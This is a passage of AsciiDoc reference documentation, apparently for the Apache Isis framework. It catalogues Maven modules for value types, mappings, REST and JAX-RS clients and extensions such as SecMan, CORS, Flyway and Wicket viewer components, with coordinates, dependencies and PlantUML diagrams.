\/valuetypes\/markdown\/ui\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui-wkt\nType: jar\nDirectory: \/valuetypes\/markdown\/ui\/wicket\n----\n|.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/ui\/wkt\/IsisModuleValMarkdownUiWkt.adoc[IsisModuleValMarkdownUiWkt]\n****\n|===\n\n=== SSE\n\n== Mappings\n\n[plantuml,Mappings,svg]\n----\n@startuml(id=Mappings)\ntitle Mappings - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mappings\\n[Software System]\" {\n rectangle \"==Apache Isis Mappings\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Mappings)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Mappings\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings\nType: pom\nDirectory: \/mappings\n----\n|Libraries and tools to map one bounded context (usually an Apache Isis application) to some other BC (usually\n_not_ an Apache Isis application).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== JAX-RS Client Library\n\n[plantuml,JAX-RS Client Library,svg]\n----\n@startuml(id=JAX-RS_Client_Library)\ntitle JAX-RS Client Library - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JAX-RS Client Library\\n[Software System]\" {\n rectangle \"==Apache Isis Map - JaxRS Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Map - JaxRS Client (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Map - JaxRS Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JAX-RS Client Library)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Map - JaxRS Client (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient\nType: pom\nDirectory: \/mappings\/jaxrsclient\n----\n|Integrates JaxRS Client Library\n\n|Apache Isis Map - JaxRS Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-applib\nType: jar\nDirectory: \/mappings\/jaxrsclient\/applib\n----\n|.Dependencies\n****\njavax:javaee-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/jaxrsclient\/applib\/IsisModuleExtJaxRsClientApplib.adoc[IsisModuleExtJaxRsClientApplib], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsClient.adoc[JaxRsClient], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsResponse.adoc[JaxRsResponse]\n****\n\n|Apache Isis Map - JaxRS Client (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-impl\nType: jar\nDirectory: \/mappings\/jaxrsclient\/testlib\n----\n|.Dependencies\n****\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\n****\n|===\n\n=== REST Client\n\n[plantuml,REST Client,svg]\n----\n@startuml(id=REST_Client)\ntitle REST Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"REST Client\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - REST Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - REST Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (REST Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - REST Client (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-restclient\nType: pom\nDirectory: \/mappings\/restclient\n----\n|A client for the Restful Objects Viewer\n\n|Apache Isis Ext - REST Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-restclient-applib\nType: jar\nDirectory: \/mappings\/restclient\/applib\n----\n|A client for the Restful Objects Viewer\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/restclient\/ActionParameterListBuilder.adoc[ActionParameterListBuilder], xref:refguide:extensions:index\/restclient\/IsisModuleExtRestClient.adoc[IsisModuleExtRestClient], xref:refguide:extensions:index\/restclient\/ResponseDigest.adoc[ResponseDigest], xref:refguide:extensions:index\/restclient\/RestfulClient.adoc[RestfulClient], xref:refguide:extensions:index\/restclient\/RestfulClientConfig.adoc[RestfulClientConfig], xref:refguide:extensions:index\/restclient\/RestfulClientException.adoc[RestfulClientException], xref:refguide:extensions:index\/restclient\/auth\/BasicAuthFilter.adoc[BasicAuthFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationFilter.adoc[ClientConversationFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationLogger.adoc[ClientConversationLogger]\n****\n|===\n\n== Extensions\n\n[plantuml,Extensions,svg]\n----\n@startuml(id=Extensions)\ntitle Extensions - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<22>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<23>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<24>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<19>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<20>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<21>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Extensions\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - CORS (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Ext - CORS (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Flyway\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Ext - Flyway Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Ext - Sec Man\\n<size:10>[Container: packaging: pom]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Ext - Sec Man API\\n<size:10>[Container: packaging: jar]<\/size>\" <<17>> as 17\n rectangle \"==Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Ext - Sec Man Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<19>> as 19\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<20>> as 20\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JPA)\\n<size:10>[Container: packaging: jar]<\/size>\" <<21>> as 21\n rectangle \"==Apache Isis Ext - Sec Man Realm (Using Shiro)\\n<size:10>[Container: packaging: jar]<\/size>\" <<22>> as 22\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<24>> as 24\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<23>> as 23\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Extensions\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n7 .[#707070].> 8 : \"\"\n16 .[#707070].> 17 : \"\"\n16 .[#707070].> 18 : \"\"\n16 .[#707070].> 19 : \"\"\n16 .[#707070].> 20 : \"\"\n16 .[#707070].> 21 : \"\"\n16 .[#707070].> 22 : \"\"\n23 .[#707070].> 24 : \"\"\n5 .[#707070].> 6 : \"\"\n9 .[#707070].> 10 : \"\"\n9 .[#707070].> 11 : \"\"\n12 .[#707070].> 13 : \"\"\n12 .[#707070].> 14 : \"\"\n12 .[#707070].> 15 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 16 : \"\"\n2 .[#707070].> 23 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 12 : \"\"\n@enduml\n----\n.Projects\/Modules (Extensions)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Extensions\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions\nType: pom\nDirectory: \/extensions\n----\n|Extensions to the Apache Isis framework itself.\nThese are _not_ intended to be called by the domain logic of an Apache Isis application (see instead org.apache.isis.platform).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Ext - CORS (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors\nType: pom\nDirectory: \/extensions\/vro\/cors\n----\n|Implementation of CORS Filter (using ebay filter)\n\n|Apache Isis Ext - CORS (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors-impl\nType: jar\nDirectory: \/extensions\/vro\/cors\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/cors\/impl\/IsisModuleExtCorsImpl.adoc[IsisModuleExtCorsImpl]\n****\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload\nType: pom\nDirectory: \/extensions\/vw\/exceldownload\n----\n|A component for Apache Isis' Wicket viewer, providing an alternative representation of collections to be downloaded as an Excel spreadsheet.\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload-ui\nType: jar\nDirectory: \/extensions\/vw\/exceldownload\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.exceldownload.ui.components.CollectionContentsAsExcelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/IsisModuleExtExcelDownloadUi.adoc[IsisModuleExtExcelDownloadUi], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcel.adoc[CollectionContentsAsExcel], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcelFactory.adoc[CollectionContentsAsExcelFactory]\n****\n\n|Apache Isis Ext - Flyway\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway\nType: pom\nDirectory: \/extensions\/core\/flyway\n----\n|Integrates Flyway when using any (relational) persistence store\n\n|Apache Isis Ext - Flyway Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway-impl\nType: jar\nDirectory: \/extensions\/core\/flyway\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.flywaydb:flyway-core:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework.boot:spring-boot-autoconfigure:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar\nType: pom\nDirectory: \/extensions\/vw\/fullcalendar\n----\n|A component for Apache Isis' Wicket viewer, displaying collections of objects that have a date on a fullcalendar.io (JavaScript widget).\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-applib\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/applib\/CalendarEventable.adoc[CalendarEventable], xref:refguide:extensions:index\/fullcalendar\/applib\/Calendarable.adoc[Calendarable], xref:refguide:extensions:index\/fullcalendar\/applib\/IsisModuleExtFullCalendarApplib.adoc[IsisModuleExtFullCalendarApplib], xref:refguide:extensions:index\/fullcalendar\/applib\/spi\/CalendarableDereferencingService.adoc[CalendarableDereferencingService], xref:refguide:extensions:index\/fullcalendar\/applib\/value\/CalendarEvent.adoc[CalendarEvent]\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-ui\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/ui\n----\n|.Dependencies\n****\nnet.ftlines.wicket-fullcalendar:wicket-fullcalendar-core:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-fullcalendar-applib:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/ui\/component\/IsisModuleExtFullCalendarUi.adoc[IsisModuleExtFullCalendarUi]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs\nType: pom\nDirectory: \/extensions\/vw\/pdfjs\n----\n|A component for Apache Isis' Wicket viewer, allowing BLOBs containing PDFs to be rendered in a panel using pdf.js.\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-applib\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/annotations\/PdfJsViewer.adoc[PdfJsViewer], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/PdfJsConfig.adoc[PdfJsConfig], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/Scale.adoc[Scale], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/spi\/PdfJsViewerAdvisor.adoc[PdfJsViewerAdvisor]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-metamodel\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/metamodel\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.metamodel.facet.PdfJsViewerFacetFromAnnotationFactory$Register +\n****\n\n.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-ui\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.ui.components.PdfJsViewerPanelComponentFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-pdfjs-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/ui\/IsisModuleExtPdfjsUi.adoc[IsisModuleExtPdfjsUi]\n****\n\n|Apache Isis Ext - Sec Man\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman\nType: pom\nDirectory: \/extensions\/security\/secman\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\n****\n\n|Apache Isis Ext - Sec Man API\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-api\nType: jar\nDirectory: \/extensions\/security\/secman\/api\n----\n|.Components\n****\no.a.i.extensions.secman.api.authorizor.AuthorizorSecman +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/api\/IsisModuleExtSecmanApi.adoc[IsisModuleExtSecmanApi], xref:refguide:extensions:index\/secman\/api\/SecmanConfiguration.adoc[SecmanConfiguration], xref:refguide:extensions:index\/secman\/api\/SecurityRealm.adoc[SecurityRealm], xref:refguide:extensions:index\/secman\/api\/SecurityRealmCharacteristic.adoc[SecurityRealmCharacteristic], xref:refguide:extensions:index\/secman\/api\/SecurityRealmService.adoc[SecurityRealmService], xref:refguide:extensions:index\/secman\/api\/authorizor\/AuthorizorSecman.adoc[AuthorizorSecman], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionService.adoc[PasswordEncryptionService], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionServiceNone.adoc[PasswordEncryptionServiceNone], xref:refguide:extensions:index\/secman\/api\/events\/UserCreatedEvent.adoc[UserCreatedEvent], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermission.adoc[ApplicationPermission], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionMode.adoc[ApplicationPermissionMode], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRepository.adoc[ApplicationPermissionRepository], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRule.adoc[ApplicationPermissionRule], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValue.adoc[ApplicationPermissionValue], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValueSet.adoc[ApplicationPermissionValueSet], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationService.adoc[PermissionsEvaluationService], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAbstract.adoc[PermissionsEvaluationServiceAbstract], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAllowBeatsVeto.adoc[PermissionsEvaluationServiceAllowBeatsVeto], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceVetoBeatsAllow.adoc[PermissionsEvaluationServiceVetoBeatsAllow], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRole.adoc[ApplicationRole], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRoleRepository.adoc[ApplicationRoleRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancy.adoc[ApplicationTenancy], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyEvaluator.adoc[ApplicationTenancyEvaluator], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyRepository.adoc[ApplicationTenancyRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/HasAtPath.adoc[HasAtPath], xref:refguide:extensions:index\/secman\/api\/user\/AccountType.adoc[AccountType], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUser.adoc[ApplicationUser], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserRepository.adoc[ApplicationUserRepository], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserStatus.adoc[ApplicationUserStatus]\n****\n\n|Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-encryption-jbcrypt\nType: jar\nDirectory: \/extensions\/security\/secman\/encryption-jbcrypt\n----\n|.Components\n****\no.a.i.extensions.secman.encryption.jbcrypt.services.PasswordEncryptionServiceUsingJBcrypt +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.mindrot:jbcrypt:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/IsisModuleExtSecmanEncryptionJbcrypt.adoc[IsisModuleExtSecmanEncryptionJbcrypt], xref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/services\/PasswordEncryptionServiceUsingJBcrypt.adoc[PasswordEncryptionServiceUsingJBcrypt]\n****\n\n|Apache Isis Ext - Sec Man Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-model\nType: jar\nDirectory: \/extensions\/security\/secman\/model\n----\n|.Components\n****\no.a.i.extensions.secman.model.facets.TenantedAuthorizationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/model\/IsisModuleExtSecmanModel.adoc[IsisModuleExtSecmanModel], xref:refguide:extensions:index\/secman\/model\/dom\/user\/MeService.adoc[MeService]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jdo\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jdo\n----\n|.Components\n****\no.a.i.extensions.secman.jdo.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jdo.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jdo.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jdo.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jdo.seed.SeedSecurityModuleService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jdo\/IsisModuleExtSecmanPersistenceJdo.adoc[IsisModuleExtSecmanPersistenceJdo], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JPA)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jpa\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jpa\n----\n|.Components\n****\no.a.i.extensions.secman.jpa.dom.permission.ApplicationPermissionRepository 